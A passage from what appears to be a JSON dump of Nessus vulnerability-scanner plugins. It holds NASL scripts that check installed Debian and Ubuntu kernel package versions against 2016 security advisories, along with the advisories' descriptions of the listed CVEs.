script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-tools-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"firmware-linux-free\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-base\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-doc-2.6.32\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-486\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-i386\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-openvz\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-vserver\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-xen\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-486\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem-dbg\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64-dbg\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686-dbg\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64-dbg\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem-dbg\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64-dbg\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686-dbg\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64-dbg\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-libc-dev\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-manual-2.6.32\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-patch-debian-2.6.32\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-source-2.6.32\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-support-2.6.32-5\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-tools-2.6.32\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze19\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze19\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T14:51:19", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter implementation. On systems running 32 bit kernels, a local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux-raspi2 vulnerabilities (USN-2930-3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2782", "CVE-2016-3134", "CVE-2016-3135"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2930-3.NASL", "href": "https://www.tenable.com/plugins/nessus/89995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2930-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89995);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n script_xref(name:\"USN\", value:\"2930-3\");\n\n script_name(english:\"Ubuntu 15.10 : linux-raspi2 vulnerabilities (USN-2930-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter\nimplementation. On systems running 32 bit kernels, a local\nunprivileged attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code with administrative\nprivileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2930-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.2-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2930-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-1027-raspi2\", pkgver:\"4.2.0-1027.35\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-raspi2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T14:50:52", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter implementation. On systems running 32 bit kernels, a local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux vulnerabilities (USN-2930-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2782", "CVE-2016-3134", "CVE-2016-3135"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2930-1.NASL", "href": "https://www.tenable.com/plugins/nessus/89934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2930-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89934);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n script_xref(name:\"USN\", value:\"2930-1\");\n\n script_name(english:\"Ubuntu 15.10 : linux vulnerabilities (USN-2930-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter\nimplementation. On systems running 32 bit kernels, a local\nunprivileged attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code with administrative\nprivileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2930-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2930-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-34-generic\", pkgver:\"4.2.0-34.39\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-34-generic-lpae\", pkgver:\"4.2.0-34.39\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-34-lowlatency\", pkgver:\"4.2.0-34.39\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T14:53:21", "description": "Ben Hawkes discovered that the Linux 